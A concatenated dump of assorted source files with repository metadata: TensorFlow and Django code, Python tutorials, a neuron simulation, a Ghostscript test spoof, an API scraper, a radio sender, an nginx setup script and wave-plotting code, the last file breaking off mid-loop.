dropout = 0.75 # Dropout, probability to keep units
# Create the neural network
def conv_net(x_dict, n_classes, dropout, reuse, is_training):
# Define a scope for reusing the variables
with tf.variable_scope('ConvNet', reuse=reuse):
# TF Estimator input is a dict, in case of multiple inputs
x = x_dict['images']
# MNIST data input is a 1-D vector of 784 features (28*28 pixels)
# Reshape to match picture format [Height x Width x Channel]
# Tensor input become 4-D: [Batch Size, Height, Width, Channel]
x = tf.reshape(x, shape=[-1, 28, 28, 1])
# Convolution Layer with 32 filters and a kernel size of 5
conv1 = tf.layers.conv2d(x, 32, 5, activation=tf.nn.relu)
# Max Pooling (down-sampling) with strides of 2 and kernel size of 2
conv1 = tf.layers.max_pooling2d(conv1, 2, 2)
# Convolution Layer with 64 filters and a kernel size of 3
conv2 = tf.layers.conv2d(conv1, 64, 3, activation=tf.nn.relu)
# Max Pooling (down-sampling) with strides of 2 and kernel size of 2
conv2 = tf.layers.max_pooling2d(conv2, 2, 2)
# Flatten the data to a 1-D vector for the fully connected layer
fc1 = tf.contrib.layers.flatten(conv2)
# Fully connected layer (in tf contrib folder for now)
fc1 = tf.layers.dense(fc1, 1024)
# Apply Dropout (if is_training is False, dropout is not applied)
fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)
# Output layer, class prediction
out = tf.layers.dense(fc1, n_classes)
return out
# Define the model function (following TF Estimator Template)
def model_fn(features, labels, mode):
# Build the neural network
# Because Dropout have different behavior at training and prediction time, we
# need to create 2 distinct computation graphs that still share the same weights.
logits_train = conv_net(features, num_classes, dropout, reuse=False,
is_training=True)
logits_test = conv_net(features, num_classes, dropout, reuse=True,
is_training=False)
# Predictions
pred_classes = tf.argmax(logits_test, axis=1)
pred_probas = tf.nn.softmax(logits_test)
# If prediction mode, early return
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode, predictions=pred_classes)
# Define loss and optimizer
print(logits_train.shape)
print(labels.shape)
loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits_train, labels=tf.cast(labels, dtype=tf.int32)))
# tf.summary.scalar(name='loss', tensor=loss_op)
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(loss_op,
global_step=tf.train.get_global_step())
# Evaluate the accuracy of the model
acc_op = tf.metrics.accuracy(labels=labels, predictions=pred_classes)
# merge_all_op = tf.summary.merge_all()
# TF Estimators requires to return a EstimatorSpec, that specify
# the different ops for training, evaluating, ...
estim_specs = tf.estimator.EstimatorSpec(
mode=mode,
predictions=pred_classes,
loss=loss_op,
train_op=train_op,
eval_metric_ops={'accuracy': acc_op})
return estim_specs
# Build the Estimator
model = tf.estimator.Estimator(model_fn, model_dir='logdir')
# Define the input function for training
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': mnist.train.images}, y=mnist.train.labels,
batch_size=batch_size, num_epochs=None, shuffle=True)
# Train the Model
model.train(input_fn, steps=num_steps)
# Evaluate the Model
# Define the input function for evaluating
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': mnist.test.images}, y=mnist.test.labels,
batch_size=batch_size, shuffle=False)
# Use the Estimator 'evaluate' method
e = model.evaluate(input_fn)
print("Testing Accuracy:", e['accuracy'])
|
[
"chk0125@126.com"
] |
chk0125@126.com
|
2c6659fa00d6ac07197690b564d7aac721369d86
|
a2fb6bda878d79e4b31d8b3d76d9a2a40dc604ef
|
/backend/notes/serializers.py
|
6388c086796a97dc998df942375fbc474461a86c
|
[] |
no_license
|
Aruta1ru/budgeter
|
b3224b68601df29e952d34630d2c5891b3883291
|
672232d1be853a948171825d7b380d8d2e131f94
|
refs/heads/master
| 2023-03-27T04:01:09.424337
| 2021-03-12T12:27:54
| 2021-03-12T12:27:54
| 346,987,850
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 319
|
py
|
from rest_framework import serializers
from .models import Category, Note
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = '__all__'
class NoteSerializer(serializers.ModelSerializer):
class Meta:
model = Note
fields = '__all__'
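# Minimal usage sketch (our addition; assumes at least one saved Note exists):
#   serializer = NoteSerializer(Note.objects.first())
#   serializer.data  # -> dict of every Note field, per fields = '__all__'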
|
[
"djgraf95@gmail.com"
] |
djgraf95@gmail.com
|
85a9386cf8f783bd013959909bab9d7614a1d07a
|
78aa3c2e1bf95fa1e440f40c0a27273d5f1f6284
|
/com.kuta.python.basedata/Tuple.py
|
8bc3b8d619a73ec7ac5df3d0d6ecdd51184875d3
|
[] |
no_license
|
kutala/HelloPython
|
c98b2fe1be67b5bbd08a0ada08b875f7ce2075dd
|
d685a27956aecd01839b05523fe1f2b8b6891296
|
refs/heads/master
| 2021-01-01T15:30:14.962842
| 2016-11-29T09:38:39
| 2016-11-29T09:38:39
| 40,281,912
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
# -*- coding: UTF-8 -*-
tuple = ( 'abcd', 786 , 2.23, 'john', 70.2 )
tinytuple = (123, 'john')
print tuple              # print the complete tuple
print tuple[0]           # print the first element of the tuple
print tuple[1:3]         # print the second through third elements
print tuple[2:]          # print all elements from the third to the end
print tinytuple * 2      # print the tuple twice
print tuple + tinytuple  # print the concatenated tuples
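# Unlike lists, tuples are immutable; uncommenting the next line raises a TypeError
# tuple[2] = 1000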
|
[
"80011355@qq.com"
] |
80011355@qq.com
|
407de71cbc79d7d56529dc074e6ec44af29d49ae
|
d5a7202c1cd60ab487c4f5367bc9a4bfa3de3440
|
/TestBed/src/brain/examples/misc/ring.py
|
1aa39dac35d163116bde320f633d1b2500d7e86b
|
[] |
no_license
|
thanhmaikmt/pjl
|
40b202fa8bd513f2103bc82f3b770a1fcdcb4141
|
f2fb00f297c63a5211198cd47edce0aacfba6c11
|
refs/heads/master
| 2021-01-19T09:48:51.301034
| 2014-04-04T18:28:59
| 2014-04-04T18:28:59
| 40,103,495
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
"""
A ring of integrate-and-fire neurons.
"""
from brian import *
tau = 10 * ms
v0 = 11 * mV
N = 20
w = 1 * mV
ring = NeuronGroup(N, model='dv/dt=(v0-v)/tau : volt', threshold=10 * mV, reset=0 * mV)
W = Connection(ring, ring, 'v')
for i in range(N):
W[i, (i + 1) % N] = w
ring.v = rand(N) * 10 * mV
S = SpikeMonitor(ring)
run(300 * ms)
raster_plot(S)
show()
|
[
"pauljohnleonard@fadc175c-ebca-11de-a75d-bbceaaa5444e"
] |
pauljohnleonard@fadc175c-ebca-11de-a75d-bbceaaa5444e
|
5120c0f875dbadae51d4066d3e76b655e03280e0
|
7c222e4dd6e434ee6a489c0e518744245735cce8
|
/hackerspace_site/apps/blog/forms.py
|
2858af5dd2f46bae7db8f12edf12ec88d952961e
|
[] |
no_license
|
HackerSpace-PESU/hackerspace.pes.edu
|
ad9183eb4421d9c8534d98dbfdcf80069f0b58b3
|
0a45bc9c1ed58eba83d3c5b04f054cd36c7e9fc7
|
refs/heads/master
| 2023-05-14T00:34:49.590888
| 2021-05-27T09:51:56
| 2021-05-27T09:51:56
| 322,908,540
| 9
| 4
| null | 2021-05-27T09:51:57
| 2020-12-19T18:07:54
|
HTML
|
UTF-8
|
Python
| false
| false
| 373
|
py
|
from django.forms import ModelChoiceField, ModelForm
from martor.fields import MartorFormField
from .models import Author, Blog
class NewBlogForm(ModelForm):
author = ModelChoiceField(
queryset=Author.objects.all(),
)
blog_in_markdown = MartorFormField()
class Meta:
model = Blog
fields = ["author", "title", "blog_in_markdown"]
|
[
"noreply@github.com"
] |
HackerSpace-PESU.noreply@github.com
|
69b82c6e7c1b89da41ffdaf1099f828d16af52f8
|
3f3091436da6e2032949b3c474a663fee188f5d5
|
/webempresa/services/migrations/0004_project.py
|
ce1253050d026a35927123cc36077ac8f0560332
|
[] |
no_license
|
juanantoniotora/Curso_DJango2_WebCorporativa_Ejemplo
|
b9993bc740ee2b47c034938870841d5ee35152e7
|
975acbc0a601206edeb6235588e710c3698a192d
|
refs/heads/master
| 2022-12-07T07:01:50.230314
| 2019-10-10T19:26:00
| 2019-10-10T19:26:00
| 214,251,337
| 0
| 0
| null | 2022-11-22T02:24:23
| 2019-10-10T18:02:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,192
|
py
|
# Generated by Django 2.2.4 on 2019-10-05 18:44
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('services', '0003_delete_project'),
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='Título')),
('subtitle', models.CharField(max_length=200, verbose_name='Sub-título')),
('content', models.TextField(default='', verbose_name='Contenido')),
('image', models.ImageField(upload_to='', verbose_name='Imagen')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Creado')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Actualizado')),
],
options={
'verbose_name': 'modelo_Servicio',
'verbose_name_plural': 'tabla_Servicios',
'ordering': ['-created'],
},
),
]
|
[
"juanantonio.tora@gmail.com"
] |
juanantonio.tora@gmail.com
|
8e4033741ac16a69170a9bfaf0ba7158c207ddc2
|
d0cf8b68b68e33900544dc056566511428692b71
|
/tests/spoof/gs_feature_elision.py
|
c2aabeb4d4d1e9b78fab46632764e38d376bfe25
|
[
"MIT"
] |
permissive
|
ryanfb/OCRmyPDF
|
3f1547c164d3b74b5e6c003bb875e50c292b36a4
|
f6a4d8f1f808a1c963c85e498a773ef0439db5ed
|
refs/heads/master
| 2021-01-21T04:25:00.603736
| 2017-08-27T20:53:36
| 2017-08-27T20:53:36
| 101,911,301
| 1
| 0
| null | 2017-08-30T17:44:15
| 2017-08-30T17:44:15
| null |
UTF-8
|
Python
| false
| false
| 800
|
py
|
#!/usr/bin/env python3
# © 2016 James R. Barlow: github.com/jbarlow83
import sys
import os
from subprocess import check_call
"""Replicate one type of Ghostscript feature elision warning during
PDF/A creation."""
def real_ghostscript(argv):
gs_args = ['gs'] + argv[1:]
os.execvp("gs", gs_args)
return # Not reachable
elision_warning = """GPL Ghostscript 9.20: Setting Overprint Mode to 1
not permitted in PDF/A-2, overprint mode not set"""
def main():
if '--version' in sys.argv:
print('9.20')
        print('SPOOFED: ' + os.path.basename(__file__))
sys.exit(0)
gs_args = ['gs'] + sys.argv[1:]
check_call(gs_args)
if '-sDEVICE=pdfwrite' in sys.argv[1:]:
print(elision_warning)
sys.exit(0)
if __name__ == '__main__':
main()
|
[
"jim@purplerock.ca"
] |
jim@purplerock.ca
|
88f37dcfa3636c5a91c3546ae84c383167f931e2
|
5ec06dab1409d790496ce082dacb321392b32fe9
|
/clients/python-flask/generated/openapi_server/models/com_adobe_cq_social_commons_emailreply_impl_custom_email_client_provider_properties.py
|
4d9bc47c42da303a7c969c543512bee62080c310
|
[
"Apache-2.0"
] |
permissive
|
shinesolutions/swagger-aem-osgi
|
e9d2385f44bee70e5bbdc0d577e99a9f2525266f
|
c2f6e076971d2592c1cbd3f70695c679e807396b
|
refs/heads/master
| 2022-10-29T13:07:40.422092
| 2021-04-09T07:46:03
| 2021-04-09T07:46:03
| 190,217,155
| 3
| 3
|
Apache-2.0
| 2022-10-05T03:26:20
| 2019-06-04T14:23:28
| null |
UTF-8
|
Python
| false
| false
| 4,134
|
py
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.config_node_property_array import ConfigNodePropertyArray # noqa: F401,E501
from openapi_server.models.config_node_property_integer import ConfigNodePropertyInteger # noqa: F401,E501
from openapi_server import util
class ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, priority_order: ConfigNodePropertyInteger=None, reply_email_patterns: ConfigNodePropertyArray=None): # noqa: E501
"""ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties - a model defined in OpenAPI
:param priority_order: The priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties. # noqa: E501
:type priority_order: ConfigNodePropertyInteger
:param reply_email_patterns: The reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties. # noqa: E501
:type reply_email_patterns: ConfigNodePropertyArray
"""
self.openapi_types = {
'priority_order': ConfigNodePropertyInteger,
'reply_email_patterns': ConfigNodePropertyArray
}
self.attribute_map = {
'priority_order': 'priorityOrder',
'reply_email_patterns': 'replyEmailPatterns'
}
self._priority_order = priority_order
self._reply_email_patterns = reply_email_patterns
@classmethod
def from_dict(cls, dikt) -> 'ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The comAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties. # noqa: E501
:rtype: ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties
"""
return util.deserialize_model(dikt, cls)
@property
def priority_order(self) -> ConfigNodePropertyInteger:
"""Gets the priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:return: The priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:rtype: ConfigNodePropertyInteger
"""
return self._priority_order
@priority_order.setter
def priority_order(self, priority_order: ConfigNodePropertyInteger):
"""Sets the priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:param priority_order: The priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:type priority_order: ConfigNodePropertyInteger
"""
self._priority_order = priority_order
@property
def reply_email_patterns(self) -> ConfigNodePropertyArray:
"""Gets the reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:return: The reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:rtype: ConfigNodePropertyArray
"""
return self._reply_email_patterns
@reply_email_patterns.setter
def reply_email_patterns(self, reply_email_patterns: ConfigNodePropertyArray):
"""Sets the reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:param reply_email_patterns: The reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:type reply_email_patterns: ConfigNodePropertyArray
"""
self._reply_email_patterns = reply_email_patterns
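# Round-trip sketch (our addition; relies on util.deserialize_model accepting a
# plain dict keyed by the attribute_map names shown above):
#   props = ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.from_dict(
#       {'priorityOrder': None, 'replyEmailPatterns': None})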
|
[
"cliffano@gmail.com"
] |
cliffano@gmail.com
|
125fd5dd7734d83661f29aaad97899bcd613ff7e
|
8b5225609f76dab9afb261654d27074c1ce24d03
|
/md_320_2.py
|
5effc01ceb3db4260a53eb402c8f3507ef17d65f
|
[] |
no_license
|
wlstjd2378/python4095
|
27a55db195380b82641cab7cba5fee3ed8aaff83
|
78f45ea30aa3dabd14d5422813092ba8c031c8e3
|
refs/heads/master
| 2020-05-30T17:49:50.405382
| 2019-06-03T03:18:58
| 2019-06-03T03:18:58
| 189,883,998
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,973
|
py
|
import requests
from bs4 import BeautifulSoup
import pandas as pd
url = 'http://apis.data.go.kr/B552061/jaywalking/getRestJaywalking'
queryParams = '?' + 'serviceKey=' + 'nBR6ds%2BFTLtKBfkc9qEKhBBGdZF09DnpkSRWSKTyxiHp%2BRVBtJbWjTQMqvvMb%2FVf0TGceYhCeGyvpHtJAhIlJA%3D%3D' \
+ '&searchYearCd=' + '2017' \
+ '&siDo=' + '26' \
+ '&guGun=' + '320' \
+ '&type=' + 'xml' \
+ '&numOfRows=' + '25' \
+ '&pageNo=' + '1'
url = url + queryParams
result = requests.get(url)
bs_obj = BeautifulSoup(result.content, "html.parser")
data1 = bs_obj.findAll('spot_nm')      # accident hotspot name
data2 = bs_obj.findAll('occrrnc_cnt')  # number of accidents
data3 = bs_obj.findAll('dth_dnv_cnt')  # deaths
data4 = bs_obj.findAll('caslt_cnt')    # casualties
data5 = bs_obj.findAll('se_dnv_cnt')   # serious injuries
data6 = bs_obj.findAll('sl_dnv_cnt')   # minor injuries
# list_data = {'다발지역명':[],'발생건수':[],'사망자수':[],\
# '부상자수':[],'중상':[],'경상':[],\
# '시군구':['중구','서구','동구','영도구','부산진구','동래구','남구','북구','해운대구','사하구','금정구','강서구','연제구','수영구','사상구','기장군']}
data = {'시군구': [],'다발지역명':[],'발생건수':[],'사망자수':[],'부상자수':[],'중상':[],'경상':[]}
d1,d2,d3,d4,d5,d6,d7 = [],[],[],[],[],[],[]
for i in range(0,len(data1)):
d1.append(data1[i].get_text())
d2.append(data2[i].get_text())
d3.append(data3[i].get_text())
d4.append(data4[i].get_text())
d5.append(data5[i].get_text())
d6.append(data6[i].get_text())
d7.append('북구')
data['다발지역명'] = d1
data['발생건수'] = d2
data['사망자수'] = d3
data['부상자수'] = d4
data['중상'] = d5
data['경상'] = d6
data['시군구'] = d7
df_320_2 = pd.DataFrame(data, columns = ['시군구','다발지역명','발생건수','사망자수','부상자수','중상','경상'])
#print(df_320_2)
|
[
"noreply@github.com"
] |
wlstjd2378.noreply@github.com
|
83cef915c5831fa22780de720175e98cce80ccc3
|
3a4f14d6638bc0c12c129ed73c6c3543437203df
|
/src/morphforgeexamples/multicell_simulation/multicell_simulation010.py
|
4e246688646bd3831457507719b3611426692cef
|
[
"BSD-2-Clause"
] |
permissive
|
unidesigner/morphforge
|
ef04ccb3877f069a0feea72eb1b44c97930dac44
|
510cd86549b2c2fb19296da2d4408ed8091fb962
|
refs/heads/master
| 2021-01-15T22:34:28.795355
| 2012-04-05T08:55:12
| 2012-04-05T08:55:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51
|
py
|
"""[*] Two cells connected with an AMPA synapse"""
|
[
"mikehulluk@googlemail.com"
] |
mikehulluk@googlemail.com
|
f5901347ae2393fbd28a0397052a34725ea59268
|
a1333f0e6b594eda043922363734b0e9e7e65b0e
|
/Pi sender/sender.py
|
affb768b4876f887e32a097da8ba6ad0f6c1c4ab
|
[] |
no_license
|
Kartikkh/Communication-between-Rpi-and-arduino-
|
65cb1b50871b73c8fc33c7f8b9bb4c287db09d22
|
0e961b2ba408bf1171dc3ff798f255ab99d444b2
|
refs/heads/master
| 2021-01-19T14:53:37.537722
| 2017-04-13T19:01:47
| 2017-04-13T19:01:47
| 88,194,870
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,122
|
py
|
import RPi.GPIO as GPIO
from lib_nrf24 import NRF24
import time
import spidev
GPIO.setmode(GPIO.BCM)
pipes = [[0xE8 , 0xE8 , 0xF0 , 0xF0 , 0xE1] , [0xF0 ,0xF0, 0xF0, 0xF0, 0xE1]]
radio = NRF24(GPIO,spidev.SpiDev())
radio.begin(0,17)
radio.setPayloadSize(32)
radio.setChannel(0x76)
radio.setDataRate(NRF24.BR_1MBPS)
radio.setPALevel(NRF24.PA_MIN)
radio.setAutoAck(True)
radio.enableDynamicPayloads()
radio.enableAckPayload()
radio.openWritingPipe(pipes[0])
radio.openReadingPipe(1,pipes[1])
radio.printDetails()
message = "11"
while True:
start = time.time();
radio.write(message)
print("Sent message: {}".format(message))
radio.startListening()
while not radio.available(0):
time.sleep(1/100)
if time.time() - start > 2:
print("timeOut")
break
    recievedMessage = []
    radio.read(recievedMessage, radio.getDynamicPayloadSize())
    print("Received: {}".format(recievedMessage))
    print("Translating string")
    string = ''
    # Decode the payload byte values into printable ASCII; this restores the
    # translation step the print below expects (the original left `string` empty).
    for n in recievedMessage:
        if 32 <= n <= 126:
            string += chr(n)
    print("Our received message: {} ".format(string))
radio.stopListening()
time.sleep(2)
|
[
"khandelwal.kartik4gmail.comkhandelwal.kartik4gmail.com"
] |
khandelwal.kartik4gmail.comkhandelwal.kartik4gmail.com
|
a49e1855d4a2718fa0f9f0145c2892c9d810d1b8
|
6a8d994c73983de88a60ba8278ecb3f87ab98679
|
/BONJI_store/views.py
|
736d151984c759634778278d9ef5d1c5fef4550c
|
[] |
no_license
|
dberehovets/BONJI_store
|
5d12dd8c062c086b3b6ae1f6d53ce4458ecb3621
|
33701e028ed9b94a5604b663ba446a440e8e813d
|
refs/heads/master
| 2021-04-23T21:39:51.178910
| 2020-04-21T13:02:13
| 2020-04-21T13:02:13
| 250,011,659
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,241
|
py
|
from django.views.generic import TemplateView, ListView
from django.shortcuts import redirect, render
from django.http import HttpResponseRedirect
from django.core.paginator import Paginator
from accounts.forms import SubscriberForm
from accounts.models import Subscriber
from products.models import Product
from django.contrib import messages
from django.core.mail import send_mail
from random import shuffle
class HomePage(TemplateView):
template_name = 'index.html'
def post(self, request, *args, **kwargs):
form = SubscriberForm(request.POST)
if form.is_valid():
Subscriber.objects.get_or_create(**form.cleaned_data)
messages.add_message(request, messages.SUCCESS, "You are subscribed!")
return redirect('home')
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
products = list(Product.objects.all())
shuffle(products)
if len(products) >= 8:
products = products[:8]
context['products'] = products
return context
class ContactPage(TemplateView):
template_name = 'contact.html'
def post(self, request, *args, **kwargs):
# name = request.POST.get('name')
# last_name = request.POST.get('last_name')
# email = request.POST.get('email')
# subject = request.POST.get('subject') or "New message"
# message = name + " " + last_name + " wrote \n" + request.POST.get('message')
#
# send_mail(subject, message, email, ['dberehovets@gmail.com'])
messages.add_message(request, messages.SUCCESS, "Your email has been sent. Thank you!")
return redirect('contact')
def search(request):
if request.method == "POST":
req = request.POST.get('request')
        if req in ('sale', 'hot', 'new'):
products = Product.objects.filter(product_extra=req).order_by('-id')
else:
products = Product.objects.filter(name__contains=req).order_by('-id')
paginator = Paginator(products, 12)
return render(request, 'search_list.html', {'product_list': products, 'paginator': paginator})
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
|
[
"58703014+dberehovets@users.noreply.github.com"
] |
58703014+dberehovets@users.noreply.github.com
|
c5a2686d19b0f3755d88a674ad24192b5c02286a
|
19a3c90ce8873d8f9fa7498b64597ee6fe5b767b
|
/simplemes/uwip/apps.py
|
1db1524788524f91f0e65aafa0dfc46f57aabdcf
|
[
"MIT"
] |
permissive
|
saulshao/simplemes
|
5eff2730b95c0de1c9a51e70d9ebf1ebab59ff2c
|
fb317570666f776231c1ffd48c6114b9697e47f1
|
refs/heads/master
| 2020-07-26T13:00:46.494089
| 2020-03-12T08:26:42
| 2020-03-12T08:26:42
| 208,651,563
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 83
|
py
|
from django.apps import AppConfig
class UwipConfig(AppConfig):
name = 'uwip'
|
[
"saulshao@yahoo.com"
] |
saulshao@yahoo.com
|
b1a8761bb8817603f8a347b24bff02b3180b2855
|
2fc0ae670f7200a7ad936eb1e3c9d56b5ef879df
|
/create.py
|
8931526e88b73d1ab967c5b07648b2e2abae3857
|
[] |
no_license
|
alexlesan/python_automatization
|
0013c7051c94175bf17dc4ac6203db7e89f1db94
|
b6a3a4f9bd1b282dee54f5f6c783f5aa0d23dfa0
|
refs/heads/master
| 2020-09-11T06:53:54.108793
| 2019-11-15T18:24:03
| 2019-11-15T18:24:03
| 221,979,550
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,141
|
py
|
import os, errno, sys, config
import argparse
import subprocess
import time
#parser arguments
parser = argparse.ArgumentParser(description='Create new local project')
parser.add_argument('--name', type=str, help='Name of the project')
parser.add_argument('--open', type=int, nargs='?', const=1, help='Open the editor with the project')
# make the directory of the project
def make_dir(domain):
try:
path_dir = config.PATH+domain
os.mkdir(path_dir, config.ACCESS_RIGHTS)
os.chmod(path_dir, config.ACCESS_RIGHTS)
print ("Successfully created the directory: "+path_dir)
make_nginx_file(domain)
    except OSError as e:
        str_error = e.strerror
        if e.errno == errno.EEXIST:
            str_error = "\tThe directory already exists."
        msg = "\tCouldn't create the directory: " + path_dir + "."
        print(msg)
        print(str_error)
# make the nginx site-availables file and link to enabled-sites
def make_nginx_file(domain):
try:
filename_loc = domain+".loc"
full_path = config.NGINX_SITE_AVAILABLES_PATH+filename_loc
site_enabled_path = config.NGINX_SITE_ENABLED_PATH+filename_loc
#replace in file template and copy to nginx
temp_file = open(config.TEMPLATE_VH, 'r')
dest_file = open(full_path, 'w')
file_lines = temp_file.readlines()
for line in file_lines:
res = line.replace("{PROJECT_NAME}", domain)
dest_file.write(res.replace("{SERVER_NAME}", filename_loc))
temp_file.close()
dest_file.close()
#create the symlink to site-enabled
os.symlink(full_path, site_enabled_path)
print("Symlink was created.")
#update the hosts file
update_hosts_file(domain)
#restart the nginx server
restart_nginx()
except OSError as e:
print (e.strerror)
# update the hosts file with new virutal host url
def update_hosts_file(domain):
try:
str_line = "\n127.0.0.1\t"+domain.lower()+".loc"
with open(config.HOSTS_FILE_PATH, 'a') as f:
f.write(str_line)
print("Hosts file was updated.")
except OSError as e:
print(e.strerror)
# restart the nginx server after modifications
def restart_nginx():
try:
#restart the nginx
command_str = "sudo systemctl restart nginx"
os.system(command_str)
print("The nginx server was restarted successfully")
except:
print("Coudn't restart the nginx server")
# check and run the command
if __name__ == '__main__':
param = vars(parser.parse_args())
domain = param['name'].lower()
open_editor = param['open']
if domain != '':
make_dir(domain)
if open_editor == 1:
# open the project in atom editor
print("\t Opening the Atom editor...")
# atom_cmd = ["atom", config.PATH+domain]
# subprocess.Popen(atom_cmd).wait()
os.system('atom '+config.PATH+domain)
time.sleep(1)
print("\t The process was finished.")
else:
print("No domain name was provided.")
|
[
"alex.lesan@gmail.com"
] |
alex.lesan@gmail.com
|
4a4d17d3ae6047f3dc96cac26f38a98d54b2c02c
|
ad32c2f9c37158540c6f221794a365b65bfbb02c
|
/lib/S02_onde_progressive.py
|
947b364f2de742fec5dfa689d3d8813b5634ee61
|
[] |
no_license
|
jjfPCSI1/py4phys
|
27bff9cd79e51b88dd926f552bda8c5d623585c0
|
47f9518d9b56e46a873bec9834c98c005a2c5017
|
refs/heads/master
| 2022-08-09T05:14:14.761789
| 2022-08-02T19:34:30
| 2022-08-02T19:34:30
| 22,642,385
| 27
| 18
| null | 2022-02-18T08:03:07
| 2014-08-05T12:21:56
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,016
|
py
|
# coding: utf8
# Unless explicitly stated otherwise below, this work was done by
# Jean-Julien Fleck, physics/IPT teacher in PCSI1 at lycée Kléber.
# You are free to reuse it and modify it to suit your needs.
'''
Illustration of the propagation to the right of a wave of arbitrary shape,
both over time in a spatial profile and spatially in a temporal profile.
'''
import numpy as np               # For np.linspace, np.exp and np.cos
import matplotlib.pyplot as plt  # For the plots
def f(u,k=10):
    '''The wave profile to propagate: a Gaussian multiplied by a cosine.'''
    return np.exp(-3*u**2) * np.cos(k*u-5)
nb_points = 1000   # Number of sampling points for the graph
nb_courbes = 3     # Number of curves to draw
# First, the spatial visualisation
x = np.linspace(-2,2,nb_points)  # Sampling in position
t = np.linspace(0,5,nb_courbes)  # Look at the profile at several times
c = 0.2  # Propagation speed of the wave
for ti in t:
    fi = f(x-c*ti)  # Sample the profile at the various x
    plt.plot(x,fi,label='$t={}$'.format(round(ti,1)))  # Plot it
# Cosmetics
plt.title('Profil spatial pour differents temps')
plt.xlabel('Position $x$')
plt.ylabel("Profil de l'onde")
plt.legend()
plt.savefig('PNG/S02_onde_progressive_spatial.png')
plt.clf()
# Now the temporal visualisation
t = np.linspace(0,10,nb_points)    # Sampling in time
x = np.linspace(0,0.6,nb_courbes)  # Look at the profile at several positions
c = 0.2  # Propagation speed of the wave
for xi in x:
    fi = f(xi-c*t)  # Sample the profile at the various t
    plt.plot(t,fi,label='$x={}$'.format(round(xi,1)))  # Plot it
# Cosmetics
plt.title('Profil temporel pour differente positions')
plt.xlabel('Temps $t$')
plt.ylabel("Profil de l'onde")
plt.legend()
plt.savefig('PNG/S02_onde_progressive_temporel.png')
plt.clf()
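# Sanity check (our addition): with c = 0.2, a feature at x = 0 when t = 0 sits
# at x = c*t = 0.2*5 = 1.0 on the last spatial curve, i.e. the whole profile
# simply translates to the right, as the form f(x - c*t) requires.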
|
[
"jeanjulien.fleck@gmail.com"
] |
jeanjulien.fleck@gmail.com
|
75398d6fb05ae07bc21020d5bd77276beee18c18
|
66a82eb045bd14d45163a76c61ad2bfe2f9d03ab
|
/EjBasicosPython/Ej9_Diccionario.py
|
5146a9bd79f6a9db005a42464bdefde5a83d80a1
|
[
"MIT"
] |
permissive
|
alexiscv/DAM2_SGE
|
c53da5fdeb0a7bcc69bf3f1f2aa929e03a62a04c
|
aa7371262e869becca51e5352a0e46c16a997f58
|
refs/heads/master
| 2021-01-24T12:23:26.714885
| 2018-02-28T00:12:10
| 2018-02-28T00:12:10
| 123,134,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,110
|
py
|
# Create a dictionary
d = {}
# Show the menu
def menu() :
print("## MENÚ ##")
print("1) Añadir término")
print("2) Buscar definición")
print("0) Salir")
print("Que desea hacer:")
opcion = int(input())
    return opcion
# Show the menu for the first time
# and read the chosen option
op = menu()
# Keep running until the user chooses to quit
while( op != 0 ):
    # Execute the selected action
    # Add a term
    if( op == 1):
        # Ask for the term's data
        print("Nombre del termino:")
        termino = input()
        print("Definición:")
        definicion = input()
